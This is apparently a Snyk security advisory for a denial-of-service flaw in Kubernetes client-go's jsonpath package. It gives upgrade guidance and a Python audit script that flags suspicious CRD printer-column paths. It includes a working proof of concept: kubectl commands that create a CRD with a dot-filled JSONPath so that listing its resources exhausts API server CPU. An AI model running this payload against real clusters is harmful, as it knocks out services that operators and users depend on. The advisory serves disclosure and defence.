Denial of Service (DoS) Affecting k8s.io/client-go/util/jsonpath package, versions <0.16.4, >=1.7.6 <1.16.0-beta.1, >=1.17.0-alpha.0 <1.17.0-alpha.1
Threat Intelligence: Exploit Maturity: Proof of concept
Snyk ID SNYK-GOLANG-K8SIOCLIENTGOUTILJSONPATH-7540854
- published 18 Jul 2024
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade k8s.io/client-go/util/jsonpath to version 0.16.4, 1.16.0-beta.1, 1.17.0-alpha.1 or higher.
Overview
k8s.io/client-go/util/jsonpath is a Go client for Kubernetes.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing its custom resources (CRs) causes enormous amounts of CPU usage on the API server, because the printer-column JSONPath expression is evaluated server-side for every listed object.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
kubectl get foo
The API server's CPU usage increases significantly.
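The fix is the upgrade above. As a complementary audit for clusters you cannot upgrade immediately, the following script (an added example, not Snyk's or the Kubernetes project's code) walks every CRD's additionalPrinterColumns, in both the v1beta1 layout used by the PoC (spec.additionalPrinterColumns, key JSONPath) and the v1 layout (spec.versions[].additionalPrinterColumns, key jsonPath), and flags paths that look pathological: runs of three or more dots like the PoC payload, unbalanced brackets, or excessive length. The threshold MAX_JSONPATH_LEN and the sample CRDs are assumptions constructed for the example; the only input format it relies on is the JSON list that `kubectl get crd -o json` prints.

```python
import json
import re
import sys
from typing import Iterator

# Assumed audit thresholds (not values from the advisory): a printer-column
# path longer than this, or containing three or more consecutive dots, is
# flagged for review. A single ".." is legal recursive descent in JSONPath.
MAX_JSONPATH_LEN = 256
RUN_OF_DOTS = re.compile(r"\.{3,}")


def printer_columns(crd: dict) -> Iterator[tuple[str, str, str]]:
    """Yield (version, column name, path) for every printer column, covering
    the v1beta1 layout (spec.additionalPrinterColumns, key 'JSONPath') and the
    v1 layout (spec.versions[].additionalPrinterColumns, key 'jsonPath')."""
    spec = crd.get("spec") or {}
    for col in spec.get("additionalPrinterColumns") or []:
        yield (spec.get("version", ""), col.get("name", ""),
               col.get("JSONPath") or col.get("jsonPath") or "")
    for ver in spec.get("versions") or []:
        for col in ver.get("additionalPrinterColumns") or []:
            yield (ver.get("name", ""), col.get("name", ""),
                   col.get("jsonPath") or col.get("JSONPath") or "")


def jsonpath_problems(path: str) -> list[str]:
    """Return the reasons a printer-column path looks pathological (empty if none)."""
    problems = []
    if len(path) > MAX_JSONPATH_LEN:
        problems.append(f"path length {len(path)} exceeds {MAX_JSONPATH_LEN}")
    if RUN_OF_DOTS.search(path):
        problems.append("run of three or more consecutive dots")
    for open_, close in (("[", "]"), ("{", "}"), ("(", ")")):
        if path.count(open_) != path.count(close):
            problems.append(f"unbalanced {open_}{close}")
    return problems


def audit_crd(crd: dict) -> list[str]:
    """Flag suspicious printer-column paths in one CRD as readable findings."""
    crd_name = (crd.get("metadata") or {}).get("name", "<unnamed>")
    findings = []
    for version, column, path in printer_columns(crd):
        for problem in jsonpath_problems(path):
            findings.append(f"{crd_name} {version} column {column!r}: {problem}")
    return findings


def audit_crd_list(doc: dict) -> list[str]:
    """Audit a List document such as the output of `kubectl get crd -o json`."""
    findings = []
    for item in doc.get("items") or []:
        findings.extend(audit_crd(item))
    return findings


# Constructed samples: the first mirrors the PoC CRD above (v1beta1 layout,
# 200-dot JSONPath); the second is a benign v1-layout CRD with a normal path.
BAD_CRD = {
    "apiVersion": "apiextensions.k8s.io/v1beta1",
    "kind": "CustomResourceDefinition",
    "metadata": {"name": "foos.example.com"},
    "spec": {
        "group": "example.com", "scope": "Namespaced",
        "names": {"plural": "foos", "singular": "foo", "kind": "Foo"},
        "version": "v1",
        "additionalPrinterColumns": [
            {"name": "FOO", "type": "string", "JSONPath": "." * 200},
        ],
    },
}

GOOD_CRD = {
    "apiVersion": "apiextensions.k8s.io/v1",
    "kind": "CustomResourceDefinition",
    "metadata": {"name": "bars.example.com"},
    "spec": {
        "group": "example.com", "scope": "Namespaced",
        "names": {"plural": "bars", "singular": "bar", "kind": "Bar"},
        "versions": [{
            "name": "v1", "served": True, "storage": True,
            "additionalPrinterColumns": [
                {"name": "QUX", "type": "string", "jsonPath": ".spec.foo.bar.baz.qux"},
            ],
        }],
    },
}

if __name__ == "__main__":
    # Usage: kubectl get crd -o json | python3 audit_printer_columns.py
    # With no piped input, audit the constructed samples instead.
    doc = json.load(sys.stdin) if not sys.stdin.isatty() else {"items": [BAD_CRD, GOOD_CRD]}
    for finding in audit_crd_list(doc):
        print(finding)
```

The audit is a review aid, not a replacement for the upgrade: it reports CRDs whose printer columns deserve a look, and a cluster-admin can then edit or delete the offending columns. Note that creating CRDs is a privileged action in most clusters, so restricting that permission with RBAC is the other side of the mitigation.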
CVSS Scores
version 3.1